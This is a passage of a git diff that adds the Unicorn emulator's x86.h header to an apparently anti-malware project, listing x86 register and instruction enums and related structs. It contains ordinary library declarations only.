+*/ +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h new file mode 100644 index 0000000..cd2c66d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/x86.h @@ -0,0 +1,1446 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_X86_H +#define UNICORN_X86_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +// Borrow from SegmentCache in qemu/target-i386/cpu.h +typedef struct uc_x86_mmr { + uint16_t selector; /* not used by GDTR and IDTR */ + uint64_t base; /* handle 32 or 64 bit CPUs */ + uint32_t limit; + uint32_t flags; /* not used by GDTR and IDTR */ +} uc_x86_mmr; + +// Model-Specific Register structure, use this with UC_X86_REG_MSR (as the register ID) in +// call to uc_reg_write/uc_reg_read() to manipulate MSRs. +typedef struct uc_x86_msr { + uint32_t rid; // MSR id + uint64_t value; // MSR value +} uc_x86_msr; + +// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +// @user_data: user data passed to tracing APIs. 
+typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +//> X86 registers +typedef enum uc_x86_reg { + UC_X86_REG_INVALID = 0, + UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, + UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, + UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, + UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, + UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, + UC_X86_REG_EIP, UC_X86_REG_EIZ, UC_X86_REG_ES, UC_X86_REG_ESI, UC_X86_REG_ESP, + UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, + UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, + UC_X86_REG_RIP, UC_X86_REG_RIZ, UC_X86_REG_RSI, UC_X86_REG_RSP, UC_X86_REG_SI, + UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, + UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR5, + UC_X86_REG_CR6, UC_X86_REG_CR7, UC_X86_REG_CR8, UC_X86_REG_CR9, UC_X86_REG_CR10, + UC_X86_REG_CR11, UC_X86_REG_CR12, UC_X86_REG_CR13, UC_X86_REG_CR14, UC_X86_REG_CR15, + UC_X86_REG_DR0, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, + UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_DR8, UC_X86_REG_DR9, + UC_X86_REG_DR10, UC_X86_REG_DR11, UC_X86_REG_DR12, UC_X86_REG_DR13, UC_X86_REG_DR14, + UC_X86_REG_DR15, UC_X86_REG_FP0, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, + UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, + UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, + UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, + UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, + UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, + UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, + 
UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, + UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, + UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, + UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, + UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, UC_X86_REG_XMM13, UC_X86_REG_XMM14, + UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, + UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, + UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, + UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, + UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, + UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, + UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, + UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, + UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, + UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, + UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, + UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, + UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, + UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, + UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, + UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, + UC_X86_REG_ZMM31, UC_X86_REG_R8B, UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, + UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, 
UC_X86_REG_R15B, UC_X86_REG_R8D, + UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, + UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, + UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, + UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, + UC_X86_REG_FPTAG, + UC_X86_REG_MSR, // Model-Specific Register + UC_X86_REG_MXCSR, + UC_X86_REG_FS_BASE, // Base regs for x86_64 + UC_X86_REG_GS_BASE, + UC_X86_REG_ENDING // <-- mark the end of the list of registers +} uc_x86_reg; + +//> X86 instructions +typedef enum uc_x86_insn { + UC_X86_INS_INVALID = 0, + + UC_X86_INS_AAA, + UC_X86_INS_AAD, + UC_X86_INS_AAM, + UC_X86_INS_AAS, + UC_X86_INS_FABS, + UC_X86_INS_ADC, + UC_X86_INS_ADCX, + UC_X86_INS_ADD, + UC_X86_INS_ADDPD, + UC_X86_INS_ADDPS, + UC_X86_INS_ADDSD, + UC_X86_INS_ADDSS, + UC_X86_INS_ADDSUBPD, + UC_X86_INS_ADDSUBPS, + UC_X86_INS_FADD, + UC_X86_INS_FIADD, + UC_X86_INS_FADDP, + UC_X86_INS_ADOX, + UC_X86_INS_AESDECLAST, + UC_X86_INS_AESDEC, + UC_X86_INS_AESENCLAST, + UC_X86_INS_AESENC, + UC_X86_INS_AESIMC, + UC_X86_INS_AESKEYGENASSIST, + UC_X86_INS_AND, + UC_X86_INS_ANDN, + UC_X86_INS_ANDNPD, + UC_X86_INS_ANDNPS, + UC_X86_INS_ANDPD, + UC_X86_INS_ANDPS, + UC_X86_INS_ARPL, + UC_X86_INS_BEXTR, + UC_X86_INS_BLCFILL, + UC_X86_INS_BLCI, + UC_X86_INS_BLCIC, + UC_X86_INS_BLCMSK, + UC_X86_INS_BLCS, + UC_X86_INS_BLENDPD, + UC_X86_INS_BLENDPS, + UC_X86_INS_BLENDVPD, + UC_X86_INS_BLENDVPS, + UC_X86_INS_BLSFILL, + UC_X86_INS_BLSI, + UC_X86_INS_BLSIC, + UC_X86_INS_BLSMSK, + UC_X86_INS_BLSR, + UC_X86_INS_BOUND, + UC_X86_INS_BSF, + UC_X86_INS_BSR, + UC_X86_INS_BSWAP, + UC_X86_INS_BT, + UC_X86_INS_BTC, + UC_X86_INS_BTR, + UC_X86_INS_BTS, + UC_X86_INS_BZHI, + UC_X86_INS_CALL, + UC_X86_INS_CBW, + UC_X86_INS_CDQ, + UC_X86_INS_CDQE, + UC_X86_INS_FCHS, + UC_X86_INS_CLAC, + UC_X86_INS_CLC, + UC_X86_INS_CLD, + UC_X86_INS_CLFLUSH, + UC_X86_INS_CLFLUSHOPT, + 
UC_X86_INS_CLGI, + UC_X86_INS_CLI, + UC_X86_INS_CLTS, + UC_X86_INS_CLWB, + UC_X86_INS_CMC, + UC_X86_INS_CMOVA, + UC_X86_INS_CMOVAE, + UC_X86_INS_CMOVB, + UC_X86_INS_CMOVBE, + UC_X86_INS_FCMOVBE, + UC_X86_INS_FCMOVB, + UC_X86_INS_CMOVE, + UC_X86_INS_FCMOVE, + UC_X86_INS_CMOVG, + UC_X86_INS_CMOVGE, + UC_X86_INS_CMOVL, + UC_X86_INS_CMOVLE, + UC_X86_INS_FCMOVNBE, + UC_X86_INS_FCMOVNB, + UC_X86_INS_CMOVNE, + UC_X86_INS_FCMOVNE, + UC_X86_INS_CMOVNO, + UC_X86_INS_CMOVNP, + UC_X86_INS_FCMOVNU, + UC_X86_INS_CMOVNS, + UC_X86_INS_CMOVO, + UC_X86_INS_CMOVP, + UC_X86_INS_FCMOVU, + UC_X86_INS_CMOVS, + UC_X86_INS_CMP, + UC_X86_INS_CMPPD, + UC_X86_INS_CMPPS, + UC_X86_INS_CMPSB, + UC_X86_INS_CMPSD, + UC_X86_INS_CMPSQ, + UC_X86_INS_CMPSS, + UC_X86_INS_CMPSW, + UC_X86_INS_CMPXCHG16B, + UC_X86_INS_CMPXCHG, + UC_X86_INS_CMPXCHG8B, + UC_X86_INS_COMISD, + UC_X86_INS_COMISS, + UC_X86_INS_FCOMP, + UC_X86_INS_FCOMPI, + UC_X86_INS_FCOMI, + UC_X86_INS_FCOM, + UC_X86_INS_FCOS, + UC_X86_INS_CPUID, + UC_X86_INS_CQO, + UC_X86_INS_CRC32, + UC_X86_INS_CVTDQ2PD, + UC_X86_INS_CVTDQ2PS, + UC_X86_INS_CVTPD2DQ, + UC_X86_INS_CVTPD2PS, + UC_X86_INS_CVTPS2DQ, + UC_X86_INS_CVTPS2PD, + UC_X86_INS_CVTSD2SI, + UC_X86_INS_CVTSD2SS, + UC_X86_INS_CVTSI2SD, + UC_X86_INS_CVTSI2SS, + UC_X86_INS_CVTSS2SD, + UC_X86_INS_CVTSS2SI, + UC_X86_INS_CVTTPD2DQ, + UC_X86_INS_CVTTPS2DQ, + UC_X86_INS_CVTTSD2SI, + UC_X86_INS_CVTTSS2SI, + UC_X86_INS_CWD, + UC_X86_INS_CWDE, + UC_X86_INS_DAA, + UC_X86_INS_DAS, + UC_X86_INS_DATA16, + UC_X86_INS_DEC, + UC_X86_INS_DIV, + UC_X86_INS_DIVPD, + UC_X86_INS_DIVPS, + UC_X86_INS_FDIVR, + UC_X86_INS_FIDIVR, + UC_X86_INS_FDIVRP, + UC_X86_INS_DIVSD, + UC_X86_INS_DIVSS, + UC_X86_INS_FDIV, + UC_X86_INS_FIDIV, + UC_X86_INS_FDIVP, + UC_X86_INS_DPPD, + UC_X86_INS_DPPS, + UC_X86_INS_RET, + UC_X86_INS_ENCLS, + UC_X86_INS_ENCLU, + UC_X86_INS_ENTER, + UC_X86_INS_EXTRACTPS, + UC_X86_INS_EXTRQ, + UC_X86_INS_F2XM1, + UC_X86_INS_LCALL, + UC_X86_INS_LJMP, + UC_X86_INS_FBLD, + UC_X86_INS_FBSTP, + 
UC_X86_INS_FCOMPP, + UC_X86_INS_FDECSTP, + UC_X86_INS_FEMMS, + UC_X86_INS_FFREE, + UC_X86_INS_FICOM, + UC_X86_INS_FICOMP, + UC_X86_INS_FINCSTP, + UC_X86_INS_FLDCW, + UC_X86_INS_FLDENV, + UC_X86_INS_FLDL2E, + UC_X86_INS_FLDL2T, + UC_X86_INS_FLDLG2, + UC_X86_INS_FLDLN2, + UC_X86_INS_FLDPI, + UC_X86_INS_FNCLEX, + UC_X86_INS_FNINIT, + UC_X86_INS_FNOP, + UC_X86_INS_FNSTCW, + UC_X86_INS_FNSTSW, + UC_X86_INS_FPATAN, + UC_X86_INS_FPREM, + UC_X86_INS_FPREM1, + UC_X86_INS_FPTAN, + UC_X86_INS_FFREEP, + UC_X86_INS_FRNDINT, + UC_X86_INS_FRSTOR, + UC_X86_INS_FNSAVE, + UC_X86_INS_FSCALE, + UC_X86_INS_FSETPM, + UC_X86_INS_FSINCOS, + UC_X86_INS_FNSTENV, + UC_X86_INS_FXAM, + UC_X86_INS_FXRSTOR, + UC_X86_INS_FXRSTOR64, + UC_X86_INS_FXSAVE, + UC_X86_INS_FXSAVE64, + UC_X86_INS_FXTRACT, + UC_X86_INS_FYL2X, + UC_X86_INS_FYL2XP1, + UC_X86_INS_MOVAPD, + UC_X86_INS_MOVAPS, + UC_X86_INS_ORPD, + UC_X86_INS_ORPS, + UC_X86_INS_VMOVAPD, + UC_X86_INS_VMOVAPS, + UC_X86_INS_XORPD, + UC_X86_INS_XORPS, + UC_X86_INS_GETSEC, + UC_X86_INS_HADDPD, + UC_X86_INS_HADDPS, + UC_X86_INS_HLT, + UC_X86_INS_HSUBPD, + UC_X86_INS_HSUBPS, + UC_X86_INS_IDIV, + UC_X86_INS_FILD, + UC_X86_INS_IMUL, + UC_X86_INS_IN, + UC_X86_INS_INC, + UC_X86_INS_INSB, + UC_X86_INS_INSERTPS, + UC_X86_INS_INSERTQ, + UC_X86_INS_INSD, + UC_X86_INS_INSW, + UC_X86_INS_INT, + UC_X86_INS_INT1, + UC_X86_INS_INT3, + UC_X86_INS_INTO, + UC_X86_INS_INVD, + UC_X86_INS_INVEPT, + UC_X86_INS_INVLPG, + UC_X86_INS_INVLPGA, + UC_X86_INS_INVPCID, + UC_X86_INS_INVVPID, + UC_X86_INS_IRET, + UC_X86_INS_IRETD, + UC_X86_INS_IRETQ, + UC_X86_INS_FISTTP, + UC_X86_INS_FIST, + UC_X86_INS_FISTP, + UC_X86_INS_UCOMISD, + UC_X86_INS_UCOMISS, + UC_X86_INS_VCOMISD, + UC_X86_INS_VCOMISS, + UC_X86_INS_VCVTSD2SS, + UC_X86_INS_VCVTSI2SD, + UC_X86_INS_VCVTSI2SS, + UC_X86_INS_VCVTSS2SD, + UC_X86_INS_VCVTTSD2SI, + UC_X86_INS_VCVTTSD2USI, + UC_X86_INS_VCVTTSS2SI, + UC_X86_INS_VCVTTSS2USI, + UC_X86_INS_VCVTUSI2SD, + UC_X86_INS_VCVTUSI2SS, + UC_X86_INS_VUCOMISD, + 
UC_X86_INS_VUCOMISS, + UC_X86_INS_JAE, + UC_X86_INS_JA, + UC_X86_INS_JBE, + UC_X86_INS_JB, + UC_X86_INS_JCXZ, + UC_X86_INS_JECXZ, + UC_X86_INS_JE, + UC_X86_INS_JGE, + UC_X86_INS_JG, + UC_X86_INS_JLE, + UC_X86_INS_JL, + UC_X86_INS_JMP, + UC_X86_INS_JNE, + UC_X86_INS_JNO, + UC_X86_INS_JNP, + UC_X86_INS_JNS, + UC_X86_INS_JO, + UC_X86_INS_JP, + UC_X86_INS_JRCXZ, + UC_X86_INS_JS, + UC_X86_INS_KANDB, + UC_X86_INS_KANDD, + UC_X86_INS_KANDNB, + UC_X86_INS_KANDND, + UC_X86_INS_KANDNQ, + UC_X86_INS_KANDNW, + UC_X86_INS_KANDQ, + UC_X86_INS_KANDW, + UC_X86_INS_KMOVB, + UC_X86_INS_KMOVD, + UC_X86_INS_KMOVQ, + UC_X86_INS_KMOVW, + UC_X86_INS_KNOTB, + UC_X86_INS_KNOTD, + UC_X86_INS_KNOTQ, + UC_X86_INS_KNOTW, + UC_X86_INS_KORB, + UC_X86_INS_KORD, + UC_X86_INS_KORQ, + UC_X86_INS_KORTESTB, + UC_X86_INS_KORTESTD, + UC_X86_INS_KORTESTQ, + UC_X86_INS_KORTESTW, + UC_X86_INS_KORW, + UC_X86_INS_KSHIFTLB, + UC_X86_INS_KSHIFTLD, + UC_X86_INS_KSHIFTLQ, + UC_X86_INS_KSHIFTLW, + UC_X86_INS_KSHIFTRB, + UC_X86_INS_KSHIFTRD, + UC_X86_INS_KSHIFTRQ, + UC_X86_INS_KSHIFTRW, + UC_X86_INS_KUNPCKBW, + UC_X86_INS_KXNORB, + UC_X86_INS_KXNORD, + UC_X86_INS_KXNORQ, + UC_X86_INS_KXNORW, + UC_X86_INS_KXORB, + UC_X86_INS_KXORD, + UC_X86_INS_KXORQ, + UC_X86_INS_KXORW, + UC_X86_INS_LAHF, + UC_X86_INS_LAR, + UC_X86_INS_LDDQU, + UC_X86_INS_LDMXCSR, + UC_X86_INS_LDS, + UC_X86_INS_FLDZ, + UC_X86_INS_FLD1, + UC_X86_INS_FLD, + UC_X86_INS_LEA, + UC_X86_INS_LEAVE, + UC_X86_INS_LES, + UC_X86_INS_LFENCE, + UC_X86_INS_LFS, + UC_X86_INS_LGDT, + UC_X86_INS_LGS, + UC_X86_INS_LIDT, + UC_X86_INS_LLDT, + UC_X86_INS_LMSW, + UC_X86_INS_OR, + UC_X86_INS_SUB, + UC_X86_INS_XOR, + UC_X86_INS_LODSB, + UC_X86_INS_LODSD, + UC_X86_INS_LODSQ, + UC_X86_INS_LODSW, + UC_X86_INS_LOOP, + UC_X86_INS_LOOPE, + UC_X86_INS_LOOPNE, + UC_X86_INS_RETF, + UC_X86_INS_RETFQ, + UC_X86_INS_LSL, + UC_X86_INS_LSS, + UC_X86_INS_LTR, + UC_X86_INS_XADD, + UC_X86_INS_LZCNT, + UC_X86_INS_MASKMOVDQU, + UC_X86_INS_MAXPD, + UC_X86_INS_MAXPS, + UC_X86_INS_MAXSD, + 
UC_X86_INS_MAXSS, + UC_X86_INS_MFENCE, + UC_X86_INS_MINPD, + UC_X86_INS_MINPS, + UC_X86_INS_MINSD, + UC_X86_INS_MINSS, + UC_X86_INS_CVTPD2PI, + UC_X86_INS_CVTPI2PD, + UC_X86_INS_CVTPI2PS, + UC_X86_INS_CVTPS2PI, + UC_X86_INS_CVTTPD2PI, + UC_X86_INS_CVTTPS2PI, + UC_X86_INS_EMMS, + UC_X86_INS_MASKMOVQ, + UC_X86_INS_MOVD, + UC_X86_INS_MOVDQ2Q, + UC_X86_INS_MOVNTQ, + UC_X86_INS_MOVQ2DQ, + UC_X86_INS_MOVQ, + UC_X86_INS_PABSB, + UC_X86_INS_PABSD, + UC_X86_INS_PABSW, + UC_X86_INS_PACKSSDW, + UC_X86_INS_PACKSSWB, + UC_X86_INS_PACKUSWB, + UC_X86_INS_PADDB, + UC_X86_INS_PADDD, + UC_X86_INS_PADDQ, + UC_X86_INS_PADDSB, + UC_X86_INS_PADDSW, + UC_X86_INS_PADDUSB, + UC_X86_INS_PADDUSW, + UC_X86_INS_PADDW, + UC_X86_INS_PALIGNR, + UC_X86_INS_PANDN, + UC_X86_INS_PAND, + UC_X86_INS_PAVGB, + UC_X86_INS_PAVGW, + UC_X86_INS_PCMPEQB, + UC_X86_INS_PCMPEQD, + UC_X86_INS_PCMPEQW, + UC_X86_INS_PCMPGTB, + UC_X86_INS_PCMPGTD, + UC_X86_INS_PCMPGTW, + UC_X86_INS_PEXTRW, + UC_X86_INS_PHADDSW, + UC_X86_INS_PHADDW, + UC_X86_INS_PHADDD, + UC_X86_INS_PHSUBD, + UC_X86_INS_PHSUBSW, + UC_X86_INS_PHSUBW, + UC_X86_INS_PINSRW, + UC_X86_INS_PMADDUBSW, + UC_X86_INS_PMADDWD, + UC_X86_INS_PMAXSW, + UC_X86_INS_PMAXUB, + UC_X86_INS_PMINSW, + UC_X86_INS_PMINUB, + UC_X86_INS_PMOVMSKB, + UC_X86_INS_PMULHRSW, + UC_X86_INS_PMULHUW, + UC_X86_INS_PMULHW, + UC_X86_INS_PMULLW, + UC_X86_INS_PMULUDQ, + UC_X86_INS_POR, + UC_X86_INS_PSADBW, + UC_X86_INS_PSHUFB, + UC_X86_INS_PSHUFW, + UC_X86_INS_PSIGNB, + UC_X86_INS_PSIGND, + UC_X86_INS_PSIGNW, + UC_X86_INS_PSLLD, + UC_X86_INS_PSLLQ, + UC_X86_INS_PSLLW, + UC_X86_INS_PSRAD, + UC_X86_INS_PSRAW, + UC_X86_INS_PSRLD, + UC_X86_INS_PSRLQ, + UC_X86_INS_PSRLW, + UC_X86_INS_PSUBB, + UC_X86_INS_PSUBD, + UC_X86_INS_PSUBQ, + UC_X86_INS_PSUBSB, + UC_X86_INS_PSUBSW, + UC_X86_INS_PSUBUSB, + UC_X86_INS_PSUBUSW, + UC_X86_INS_PSUBW, + UC_X86_INS_PUNPCKHBW, + UC_X86_INS_PUNPCKHDQ, + UC_X86_INS_PUNPCKHWD, + UC_X86_INS_PUNPCKLBW, + UC_X86_INS_PUNPCKLDQ, + UC_X86_INS_PUNPCKLWD, + UC_X86_INS_PXOR, + 
UC_X86_INS_MONITOR, + UC_X86_INS_MONTMUL, + UC_X86_INS_MOV, + UC_X86_INS_MOVABS, + UC_X86_INS_MOVBE, + UC_X86_INS_MOVDDUP, + UC_X86_INS_MOVDQA, + UC_X86_INS_MOVDQU, + UC_X86_INS_MOVHLPS, + UC_X86_INS_MOVHPD, + UC_X86_INS_MOVHPS, + UC_X86_INS_MOVLHPS, + UC_X86_INS_MOVLPD, + UC_X86_INS_MOVLPS, + UC_X86_INS_MOVMSKPD, + UC_X86_INS_MOVMSKPS, + UC_X86_INS_MOVNTDQA, + UC_X86_INS_MOVNTDQ, + UC_X86_INS_MOVNTI, + UC_X86_INS_MOVNTPD, + UC_X86_INS_MOVNTPS, + UC_X86_INS_MOVNTSD, + UC_X86_INS_MOVNTSS, + UC_X86_INS_MOVSB, + UC_X86_INS_MOVSD, + UC_X86_INS_MOVSHDUP, + UC_X86_INS_MOVSLDUP, + UC_X86_INS_MOVSQ, + UC_X86_INS_MOVSS, + UC_X86_INS_MOVSW, + UC_X86_INS_MOVSX, + UC_X86_INS_MOVSXD, + UC_X86_INS_MOVUPD, + UC_X86_INS_MOVUPS, + UC_X86_INS_MOVZX, + UC_X86_INS_MPSADBW, + UC_X86_INS_MUL, + UC_X86_INS_MULPD, + UC_X86_INS_MULPS, + UC_X86_INS_MULSD, + UC_X86_INS_MULSS, + UC_X86_INS_MULX, + UC_X86_INS_FMUL, + UC_X86_INS_FIMUL, + UC_X86_INS_FMULP, + UC_X86_INS_MWAIT, + UC_X86_INS_NEG, + UC_X86_INS_NOP, + UC_X86_INS_NOT, + UC_X86_INS_OUT, + UC_X86_INS_OUTSB, + UC_X86_INS_OUTSD, + UC_X86_INS_OUTSW, + UC_X86_INS_PACKUSDW, + UC_X86_INS_PAUSE, + UC_X86_INS_PAVGUSB, + UC_X86_INS_PBLENDVB, + UC_X86_INS_PBLENDW, + UC_X86_INS_PCLMULQDQ, + UC_X86_INS_PCMPEQQ, + UC_X86_INS_PCMPESTRI, + UC_X86_INS_PCMPESTRM, + UC_X86_INS_PCMPGTQ, + UC_X86_INS_PCMPISTRI, + UC_X86_INS_PCMPISTRM, + UC_X86_INS_PCOMMIT, + UC_X86_INS_PDEP, + UC_X86_INS_PEXT, + UC_X86_INS_PEXTRB, + UC_X86_INS_PEXTRD, + UC_X86_INS_PEXTRQ, + UC_X86_INS_PF2ID, + UC_X86_INS_PF2IW, + UC_X86_INS_PFACC, + UC_X86_INS_PFADD, + UC_X86_INS_PFCMPEQ, + UC_X86_INS_PFCMPGE, + UC_X86_INS_PFCMPGT, + UC_X86_INS_PFMAX, + UC_X86_INS_PFMIN, + UC_X86_INS_PFMUL, + UC_X86_INS_PFNACC, + UC_X86_INS_PFPNACC, + UC_X86_INS_PFRCPIT1, + UC_X86_INS_PFRCPIT2, + UC_X86_INS_PFRCP, + UC_X86_INS_PFRSQIT1, + UC_X86_INS_PFRSQRT, + UC_X86_INS_PFSUBR, + UC_X86_INS_PFSUB, + UC_X86_INS_PHMINPOSUW, + UC_X86_INS_PI2FD, + UC_X86_INS_PI2FW, + UC_X86_INS_PINSRB, + UC_X86_INS_PINSRD, + 
UC_X86_INS_PINSRQ, + UC_X86_INS_PMAXSB, + UC_X86_INS_PMAXSD, + UC_X86_INS_PMAXUD, + UC_X86_INS_PMAXUW, + UC_X86_INS_PMINSB, + UC_X86_INS_PMINSD, + UC_X86_INS_PMINUD, + UC_X86_INS_PMINUW, + UC_X86_INS_PMOVSXBD, + UC_X86_INS_PMOVSXBQ, + UC_X86_INS_PMOVSXBW, + UC_X86_INS_PMOVSXDQ, + UC_X86_INS_PMOVSXWD, + UC_X86_INS_PMOVSXWQ, + UC_X86_INS_PMOVZXBD, + UC_X86_INS_PMOVZXBQ, + UC_X86_INS_PMOVZXBW, + UC_X86_INS_PMOVZXDQ, + UC_X86_INS_PMOVZXWD, + UC_X86_INS_PMOVZXWQ, + UC_X86_INS_PMULDQ, + UC_X86_INS_PMULHRW, + UC_X86_INS_PMULLD, + UC_X86_INS_POP, + UC_X86_INS_POPAW, + UC_X86_INS_POPAL, + UC_X86_INS_POPCNT, + UC_X86_INS_POPF, + UC_X86_INS_POPFD, + UC_X86_INS_POPFQ, + UC_X86_INS_PREFETCH, + UC_X86_INS_PREFETCHNTA, + UC_X86_INS_PREFETCHT0, + UC_X86_INS_PREFETCHT1, + UC_X86_INS_PREFETCHT2, + UC_X86_INS_PREFETCHW, + UC_X86_INS_PSHUFD, + UC_X86_INS_PSHUFHW, + UC_X86_INS_PSHUFLW, + UC_X86_INS_PSLLDQ, + UC_X86_INS_PSRLDQ, + UC_X86_INS_PSWAPD, + UC_X86_INS_PTEST, + UC_X86_INS_PUNPCKHQDQ, + UC_X86_INS_PUNPCKLQDQ, + UC_X86_INS_PUSH, + UC_X86_INS_PUSHAW, + UC_X86_INS_PUSHAL, + UC_X86_INS_PUSHF, + UC_X86_INS_PUSHFD, + UC_X86_INS_PUSHFQ, + UC_X86_INS_RCL, + UC_X86_INS_RCPPS, + UC_X86_INS_RCPSS, + UC_X86_INS_RCR, + UC_X86_INS_RDFSBASE, + UC_X86_INS_RDGSBASE, + UC_X86_INS_RDMSR, + UC_X86_INS_RDPMC, + UC_X86_INS_RDRAND, + UC_X86_INS_RDSEED, + UC_X86_INS_RDTSC, + UC_X86_INS_RDTSCP, + UC_X86_INS_ROL, + UC_X86_INS_ROR, + UC_X86_INS_RORX, + UC_X86_INS_ROUNDPD, + UC_X86_INS_ROUNDPS, + UC_X86_INS_ROUNDSD, + UC_X86_INS_ROUNDSS, + UC_X86_INS_RSM, + UC_X86_INS_RSQRTPS, + UC_X86_INS_RSQRTSS, + UC_X86_INS_SAHF, + UC_X86_INS_SAL, + UC_X86_INS_SALC, + UC_X86_INS_SAR, + UC_X86_INS_SARX, + UC_X86_INS_SBB, + UC_X86_INS_SCASB, + UC_X86_INS_SCASD, + UC_X86_INS_SCASQ, + UC_X86_INS_SCASW, + UC_X86_INS_SETAE, + UC_X86_INS_SETA, + UC_X86_INS_SETBE, + UC_X86_INS_SETB, + UC_X86_INS_SETE, + UC_X86_INS_SETGE, + UC_X86_INS_SETG, + UC_X86_INS_SETLE, + UC_X86_INS_SETL, + UC_X86_INS_SETNE, + UC_X86_INS_SETNO, + 
